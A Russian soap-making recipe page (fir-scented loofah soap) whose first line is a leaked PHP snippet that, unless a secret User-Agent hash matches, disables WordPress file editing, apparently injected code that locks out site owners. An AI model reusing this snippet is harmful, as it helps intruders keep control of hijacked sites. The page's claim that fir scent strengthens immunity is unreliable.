if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Рецепт как сделать натуральное мыло с люфой и запахом пихты | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Рецепт как сделать натуральное мыло с люфой и запахом пихты

Ароматерапия занимает в медицине не последнее место. Мойте руки мылом с ароматом пихты несколько раз в день, вдыхая его запах, и вы закалите свой организм и усилите иммунитет!

Аро­ма­те­ра­пия зани­ма­ет в меди­цине не послед­нее место. Мой­те руки мылом с аро­ма­том пих­ты несколь­ко раз в день, вды­хая его запах, и вы зака­ли­те свой орга­низм и уси­ли­те имму­ни­тет! Ингре­ди­ен­ты:

  • 200 грамм осно­вы для мыла (жела­тель­но прозрачная)
  • пол чай­ной лож­ки основ­но­го мас­ла (пер­си­ко­вой или абри­ко­со­вой косточки)
  • 10–15 капель эфир­ных масел (пих­ты сибирской)
  • пару чай­ных ложек моло­той люфы
  • 2–3 кап­ли пище­во­го кра­си­те­ля (геле­вый зеленый)
  • фор­моч­ка для мыла — прямоугольная

Этап при­го­тов­ле­ния: Необ­хо­ди­мо рас­то­пить на водя­ной бане или в мик­ро­вол­нов­ке про­зрач­ную мыль­ную осно­ву. Затем доба­вить туда кра­си­тель и люфу. Необ­хо­ди­мо хоро­шо пере­ме­шать. Далее нуж­но вре­мя что­бы осно­ва мог­ла застыть. Перед появ­ле­ни­ем плен­ки на поверх­но­сти мыла, добавь­те в него базо­вые и эфир­ные мас­ла. Опять пере­ме­шай­те. Затем нуж­но пере­лить мыло в фор­моч­ку и дать ему остыть при обыч­ной тем­пе­ра­ту­ре или в холо­диль­ни­ке. Затем достань­те мыло из формочки.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: AmouR

Обожаю квиллинг, рукоделие и рисование. Ну и конечно мыловарение! Читайте все мои записи!